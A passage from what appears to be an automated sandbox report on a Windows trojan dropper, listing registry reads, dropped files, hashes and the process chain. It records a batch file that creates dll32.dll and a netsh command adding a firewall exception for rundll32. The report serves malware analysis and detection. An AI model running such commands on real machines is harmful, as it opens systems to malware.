HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0700\4&2C5A7332&0	ClassGUID	{4D36E969-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0A03\1	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0F13\4&2C5A7332&0	ClassGUID	{4D36E96F-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI_HAL\PNP0C08\0	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\DISPLAY\DEFAULT_MONITOR\4&2946A9FF&0&11223344&00&02	ClassGUID	{4D36E96E-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\IDE\CDROMQEMU_QEMU_CD-ROM________________________0.9.____\4D51303030302033202020202020202020202020	ClassGUID	{4D36E965-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\IDE\DISKQEMU_HARDDISK___________________________0.9.1___\4D51303030302031202020202020202020202020	ClassGUID	{4D36E967-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ISAPNP\READDATAPORT\0	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\LPTENUM\MICROSOFTRAWPORT\5&34A37E9F&0&LPT1	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&3DE75EA&0&0	ClassGUID	{4D36E96A-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&3DE75EA&0&1	ClassGUID	{4D36E96A-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_1013&DEV_00B8&SUBSYS_00000000&REV_00\3&13C0B0C5&0&10	ClassGUID	{4D36E968-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	2
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18	DeviceDesc	Realtek RTL8029(AS)-based Ethernet Adapter (Generic)	2
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18	Driver	{4D36E972-E325-11CE-BFC1-08002BE10318}\0001	2
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_1237&SUBSYS_00000000&REV_02\3&13C0B0C5&0&00	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_7000&SUBSYS_00000000&REV_00\3&13C0B0C5&0&08	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_7010&SUBSYS_00000000&REV_00\3&13C0B0C5&0&09	ClassGUID	{4D36E96A-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\ACPI_HAL\0000	ClassGUID	{4D36E966-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\DMIO\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\FTDISK\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_AFD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_BEEP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_DMBOOT\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_DMLOAD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_FIPS\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_GPC\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_HTTP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_IPNAT\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_IPSEC\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_KSECDD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_MNMDD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_MOUNTMGR\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDISTAPI\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDISUIO\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDIS\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDPROXY\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NETBT\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NULL\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_PARTMGR\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_PARVDM\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_RASACD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_RDPCDD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_TCPIP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_VGASAVE\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_VOLSNAP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_WANARP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMACM	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMDRV	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMMCI	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMVCD	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMVID	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_L2TPMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	2
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000	DeviceDesc	WAN Miniport (IP)	2
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000	Driver	{4D36E972-E325-11CE-BFC1-08002BE10318}\0008	2
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPPOEMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPTPMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PSCHEDMP\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PSCHEDMP\0001	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PTIMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDPDR\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDP_KBD\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDP_MOU\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0001	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0002	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\STORAGE\VOLUME\1&30A96598&0&SIGNATURE95619561OFFSET7E00LENGTH13F291800	ClassGUID	{71A27CDD-812A-11D0-BEC7-08002BE2092F}	1
HKLM\SYSTEM\CONTROLSET001\SERVICES\PlugPlay	PlugPlayServiceType	3	1
HKLM\SYSTEM\CONTROLSET001\SERVICES\RasMan\Enum	0	Root\LEGACY_RASMAN\0000	3
HKLM\SYSTEM\CONTROLSET001\SERVICES\RasMan\Enum	Count	1	6
HKLM\SYSTEM\CONTROLSET001\SERVICES\RpcSs\Enum	0	Root\LEGACY_RPCSS\0000	1
HKLM\SYSTEM\CONTROLSET001\SERVICES\RpcSs\Enum	Count	1	2
HKLM\SYSTEM\CONTROLSET001\SERVICES\TapiSrv\Enum	0	Root\LEGACY_TAPISRV\0000	2
HKLM\SYSTEM\CONTROLSET001\SERVICES\TapiSrv\Enum	Count	1	4
HKLM\System\CurrentControlSet\Services\PlugPlay	ObjectName	LocalSystem	1
HKLM\System\CurrentControlSet\Services\RasMan	ImagePath	%SystemRoot%\system32\svchost.exe -k netsvcs	1
HKLM\System\CurrentControlSet\Services\RasMan	ObjectName	LocalSystem	2
HKLM\System\CurrentControlSet\Services\RpcSs	ObjectName	NT Authority\NetworkService	1
HKLM\System\CurrentControlSet\Services\TapiSrv	ImagePath	%SystemRoot%\System32\svchost.exe -k netsvcs	1
HKLM\System\CurrentControlSet\Services\TapiSrv	ObjectName	LocalSystem	2

5.b) services.exe - File Activities

	- Files Read:

C:\ntsvcs, Flags: Named pipe

	- Files Modified:

C:\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, Flags: Named pipe

C:\WINDOWS\system32\config\SysEvent.Evt

C:\ntsvcs, Flags: Named pipe

	- File System Control Communication:

File	Control Code	Times
C:\net\NtControlPipe4, Flags: Named pipe	0x0011C017	2
C:\ntsvcs, Flags: Named pipe	0x0011001C	2

6. tt_1211198016.exe

	- General information about this executable

Analysis Reason:	Started by ld02.exe
Filename:	tt_1211198016.exe
MD5:	d05d82b80d8d4d70b83c7d8eb46231f5
SHA-1:	19371951336fa1b60669393b0f5aa0527d348c2c
File Size:	17408 Bytes
Command Line:	C:\WINDOWS\tt_1211198016.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\MSVCRT.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000

	- SigBuster Output

UPX All_Versions SN:1634

	- Ikarus Virus Scanner

Trojan-Dropper.Agent (Sig-Id:26780279)

6.a) tt_1211198016.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

6.b) tt_1211198016.exe - File Activities

	- Files Created:

c:\dll32.bat

	- Files Modified:

c:\dll32.bat

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\cmd.exe

C:\Windows\AppPatch\sysmain.sdb

c:\dll32.bat

6.c) tt_1211198016.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\system32\cmd.exe

	- Remote Threads Created:

Affected Process

C:\WINDOWS\system32\cmd.exe

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\system32\cmd.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\system32\cmd.exe

7. cmd.exe

	- General information about this executable

Analysis Reason:	Started by tt_1211198016.exe
Filename:	cmd.exe
MD5:	6d778e0f95447e6546553eeea709d03c
SHA-1:	811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
File Size:	389120 Bytes
Command Line:	cmd /c c:\dll32.bat
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000

7.a) cmd.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	1
HKLM\Software\Microsoft\Command Processor	AutoRun		1
HKLM\Software\Microsoft\Command Processor	CompletionChar	64	1
HKLM\Software\Microsoft\Command Processor	DefaultColor	0	1
HKLM\Software\Microsoft\Command Processor	EnableExtensions	1	1
HKLM\Software\Microsoft\Command Processor	PathCompletionChar	64	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\Nls\Language Groups	1	1	1
HKLM\System\CurrentControlSet\Control\Nls\Locale	00000409	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	CompletionChar	9	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	DefaultColor	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Command Processor	EnableExtensions	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

7.b) cmd.exe - File Activities

	- Files Created:

C:\WINDOWS\system32\dll32.dll

	- Files Read:

c:\dll32.bat

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\netsh.exe

C:\WINDOWS\tt_1211198016.exe

C:\Windows\AppPatch\sysmain.sdb

c:\dll32.bat

7.c) cmd.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\tt_1211198016.exe
C:\WINDOWS\tt_1211198016.exe	"C:\WINDOWS\tt_1211198016.exe" /1
C:\WINDOWS\system32\netsh.exe
C:\WINDOWS\system32\netsh.exe	netsh add allowedprogram "C:\WINDOWS\System32\rundll32.exe" dll32 ENABLE

	- Remote Threads Created:

Affected Process

C:\WINDOWS\tt_1211198016.exe

C:\WINDOWS\system32\netsh.exe

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\system32\netsh.exe

Process: C:\WINDOWS\tt_1211198016.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\system32\netsh.exe

Process: C:\WINDOWS\tt_1211198016.exe

8. jopaxx_1211198017.exe

	- General information about this executable

Analysis Reason:	Started by ld02.exe
Filename:	jopaxx_1211198017.exe
Command Line:	C:\DOCUME~1\user\LOCALS~1\Temp\\jopaxx_1211198017.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\WININET.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\Normaliz.dll	0x00330000	0x00009000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
